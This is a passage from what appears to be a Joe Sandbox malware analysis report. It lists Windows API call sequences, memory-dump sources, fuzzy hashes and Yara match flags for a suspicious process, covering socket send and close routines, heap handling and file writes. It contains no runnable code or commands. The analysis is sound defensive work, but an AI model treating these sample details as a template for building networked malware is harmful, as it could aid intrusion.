                                                                                                                              • Part of subcall function 03623F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                              • Part of subcall function 03623F60: WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                              • Part of subcall function 03623F60: shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                              • Part of subcall function 03623F60: closesocket.WS2_32(?), ref: 03624025
                                                                                                                            • ResetEvent.KERNEL32(?), ref: 036244DC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 542259498-0
                                                                                                                            • Opcode ID: b6dce9663483e8665da85c1314b71c8fc89d0bb43cc20adb41790a9285768320
                                                                                                                            • Instruction ID: 20b40af7ca1cfd676934210c72ff6e4a877a470a5770459cd24bbb916d50e4f0
                                                                                                                            • Opcode Fuzzy Hash: b6dce9663483e8665da85c1314b71c8fc89d0bb43cc20adb41790a9285768320
                                                                                                                            • Instruction Fuzzy Hash: 60215276600B149BC320EF79DD84A97B7E8EF89710F114A1EF699C7644DA71E4008BA4
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 02C34E79
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 02C34E98
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 02C34EA2
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 02C34EB9
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 02C34EC2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 02C34EC9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: 314f79f92304ef80437e57bd61486e74249382bd69447459754f90288d717416
                                                                                                                            • Instruction ID: 224d918507615b9474bc4db9693c788d86c0736ca367eec4f2a2283cc7777ba2
                                                                                                                            • Opcode Fuzzy Hash: 314f79f92304ef80437e57bd61486e74249382bd69447459754f90288d717416
                                                                                                                            • Instruction Fuzzy Hash: AD1186367043048BC731EA79EC84A6BF3DCEB98765B400E2AE645C6540D771E914CBE5
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 03624E99
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 03624EB8
                                                                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 03624EC2
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 03624ED9
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03624EE2
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 03624EE9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4082018349-0
                                                                                                                            • Opcode ID: b7c69bb79fb3bcb2fd6cfa0adfd59acc8dc2ffca5bbbf63e32c266a8326b1711
                                                                                                                            • Instruction ID: 9ac6f77b704230c679f74a444817248389ab225bac1c60233dc643751293658a
                                                                                                                            • Opcode Fuzzy Hash: b7c69bb79fb3bcb2fd6cfa0adfd59acc8dc2ffca5bbbf63e32c266a8326b1711
                                                                                                                            • Instruction Fuzzy Hash: D011B2767007148BD320EA7AED8496BF7ECFB88725B05092EFA05C3644DB71E800CBA5
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362DD32
                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 0362DE35
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast
                                                                                                                            • String ID: Main
                                                                                                                            • API String ID: 1452528299-521822810
                                                                                                                            • Opcode ID: bdf6d56655b0b0c6a41de590695fbe912af16a3bdc5bf9d0e87017fb90bec574
                                                                                                                            • Instruction ID: 221bdc11f4e1f772db4457f7725d9a50c011cbef301c09297f206862941fffaf
                                                                                                                            • Opcode Fuzzy Hash: bdf6d56655b0b0c6a41de590695fbe912af16a3bdc5bf9d0e87017fb90bec574
                                                                                                                            • Instruction Fuzzy Hash: 6241DE31A40A09DFD720DF58D880BAABBE8FF94314F1946A9E9558B351E770E941CB80
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C33F65
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,02C33648), ref: 02C34054
                                                                                                                              • Part of subcall function 02C32B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C32B96
                                                                                                                              • Part of subcall function 02C32B80: SwitchToThread.KERNEL32 ref: 02C32BAA
                                                                                                                            • send.WS2_32(?,02C47440,00000010,00000000), ref: 02C33FC6
                                                                                                                            • SetEvent.KERNEL32(?), ref: 02C33FE9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02C33FF5
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 02C34003
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02C3401B
                                                                                                                            • closesocket.WS2_32(?), ref: 02C34025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254528666-0
                                                                                                                            • Opcode ID: 58c0465e13a44256ccb5bb9be519b59bf717dd5e8cdaf5713872c416cbecfa15
                                                                                                                            • Instruction ID: 622bc324a5e0e94a70c4302cd013dbed63d55f88e35316bd5aca2f92b65d108c
                                                                                                                            • Opcode Fuzzy Hash: 58c0465e13a44256ccb5bb9be519b59bf717dd5e8cdaf5713872c416cbecfa15
                                                                                                                            • Instruction Fuzzy Hash: 6D215A79740B009BD3359F69D888B5BB7F5BB84754F500E1CE68287A80C7BAF855CB90
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03623F65
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,03623648), ref: 03624054
                                                                                                                              • Part of subcall function 03622BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03622BD6
                                                                                                                              • Part of subcall function 03622BC0: SwitchToThread.KERNEL32 ref: 03622BEA
                                                                                                                            • send.WS2_32(?,036449C0,00000010,00000000), ref: 03623FC6
                                                                                                                            • SetEvent.KERNEL32(?), ref: 03623FE9
                                                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 03623FF5
                                                                                                                            • WSACloseEvent.WS2_32(?), ref: 03624003
                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 0362401B
                                                                                                                            • closesocket.WS2_32(?), ref: 03624025
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3254528666-0
                                                                                                                            • Opcode ID: fd77f8a11fd7208a28a180f9dd4f6bd17109754ac274e1b53fbd5b097649e5f6
                                                                                                                            • Instruction ID: caf1957a57777f046f9fe2a666251dfe319b897744d73fe0a460e26bbf82bc2a
                                                                                                                            • Opcode Fuzzy Hash: fd77f8a11fd7208a28a180f9dd4f6bd17109754ac274e1b53fbd5b097649e5f6
                                                                                                                            • Instruction Fuzzy Hash: 95214778600B109BD331EB25D998B5BBBB5BB44B10F240D1CF2928A784CBB9E4418F50
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34074
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34087
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34090
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34099
                                                                                                                              • Part of subcall function 02C31350: HeapFree.KERNEL32(?,00000000,?,?,?,02C340A6,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C31390
                                                                                                                              • Part of subcall function 02C31420: HeapFree.KERNEL32(?,00000000,?,?,?,02C340B1,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C3143D
                                                                                                                              • Part of subcall function 02C31420: _free.LIBCMT ref: 02C31459
                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C340B9
                                                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C340D4
                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34150
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,02C34039,?,74DEDFA0,02C33648), ref: 02C34157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1219087420-0
                                                                                                                            • Opcode ID: 51b60e1e932ee41585f5a943a95cf3161c5998a7c433a097408044093724bfee
                                                                                                                            • Instruction ID: 5f065f698d064335d6de7904ac58710c820eb98d49ef68f8340f0decab38b62a
                                                                                                                            • Opcode Fuzzy Hash: 51b60e1e932ee41585f5a943a95cf3161c5998a7c433a097408044093724bfee
                                                                                                                            • Instruction Fuzzy Hash: 77314878600A02AFD709DF34C898B96F7E9FF48310F048A49E42987250CB35B851DFD0
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624074
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624087
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624090
                                                                                                                            • ResetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624099
                                                                                                                              • Part of subcall function 03621350: HeapFree.KERNEL32(?,00000000,?,?,?,036240A6,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03621390
                                                                                                                              • Part of subcall function 03621420: HeapFree.KERNEL32(?,00000000,?,?,?,036240B1,?,00000000,03624039,?,74DEDFA0,03623648), ref: 0362143D
                                                                                                                              • Part of subcall function 03621420: _free.LIBCMT ref: 03621459
                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 036240B9
                                                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 036240D4
                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624150
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,03624039,?,74DEDFA0,03623648), ref: 03624157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1219087420-0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_malloc
                                                                                                                            • String ID: ($6$gfff$gfff
                                                                                                                            • API String ID: 3506388080-713438465
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02C31610: __vswprintf.LIBCMT ref: 02C31646
                                                                                                                            • _malloc.LIBCMT ref: 02C32330
                                                                                                                              • Part of subcall function 02C36E83: __FF_MSGBANNER.LIBCMT ref: 02C36E9C
                                                                                                                              • Part of subcall function 02C36E83: __NMSG_WRITE.LIBCMT ref: 02C36EA3
                                                                                                                              • Part of subcall function 02C36E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36EC8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                            • API String ID: 3723585974-868042568
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 03621610: __vswprintf.LIBCMT ref: 03621646
                                                                                                                            • _malloc.LIBCMT ref: 03622330
                                                                                                                              • Part of subcall function 0362F673: __FF_MSGBANNER.LIBCMT ref: 0362F68C
                                                                                                                              • Part of subcall function 0362F673: __NMSG_WRITE.LIBCMT ref: 0362F693
                                                                                                                              • Part of subcall function 0362F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F6B8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                                                            • API String ID: 3723585974-868042568
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 02C31878
                                                                                                                            • _free.LIBCMT ref: 02C318B6
                                                                                                                            • _free.LIBCMT ref: 02C318F5
                                                                                                                            • _free.LIBCMT ref: 02C31935
                                                                                                                            • _free.LIBCMT ref: 02C3195D
                                                                                                                            • _free.LIBCMT ref: 02C31981
                                                                                                                            • _free.LIBCMT ref: 02C319B9
                                                                                                                              • Part of subcall function 02C36E49: HeapFree.KERNEL32(00000000,00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36E5F
                                                                                                                              • Part of subcall function 02C36E49: GetLastError.KERNEL32(00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000), ref: 02C36E71
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 03621878
                                                                                                                            • _free.LIBCMT ref: 036218B6
                                                                                                                            • _free.LIBCMT ref: 036218F5
                                                                                                                            • _free.LIBCMT ref: 03621935
                                                                                                                            • _free.LIBCMT ref: 0362195D
                                                                                                                            • _free.LIBCMT ref: 03621981
                                                                                                                            • _free.LIBCMT ref: 036219B9
                                                                                                                              • Part of subcall function 0362F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76), ref: 0362F64F
                                                                                                                              • Part of subcall function 0362F639: GetLastError.KERNEL32(00000000,?,03633E4C,00000000,?,03634500,00000000,00000001,00000000,?,03638DE6,00000018,03646448,0000000C,03638E76,00000000), ref: 0362F661
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C33883
                                                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 02C338C4
                                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 02C33931
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C3395C
                                                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 02C339F4
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 02C33A22
                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 02C33A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058130114-0
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03623883
                                                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 036238C4
                                                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 03623931
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0362395C
                                                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 036239F4
                                                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 03623A22
                                                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 03623A39
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058130114-0
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6BD
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0362E815,?,?,?,?,74DF23A0,00000000), ref: 0362E6D7
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362E6F2
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000), ref: 0362E6FF
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 0362E70A
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362E711
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362E71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleMutexObjectPointerReleaseSingleWaitWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4202892810-0
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C47C00,00000008,02C398EA,00000000,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C), ref: 02C397F3
                                                                                                                            • __lock.LIBCMT ref: 02C39827
                                                                                                                              • Part of subcall function 02C3C144: __mtinitlocknum.LIBCMT ref: 02C3C15A
                                                                                                                              • Part of subcall function 02C3C144: __amsg_exit.LIBCMT ref: 02C3C166
                                                                                                                              • Part of subcall function 02C3C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C399BA,0000000D,02C47C28,00000008,02C39AB1,00000000,?,02C37711,00000000,02C47B60,00000008,02C37776,?), ref: 02C3C16E
                                                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02C39834
                                                                                                                            • __lock.LIBCMT ref: 02C39848
                                                                                                                            • ___addlocaleref.LIBCMT ref: 02C39866
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                            • String ID: KERNEL32.DLL
                                                                                                                            • API String ID: 637971194-2576044830
                                                                                                                            APIs
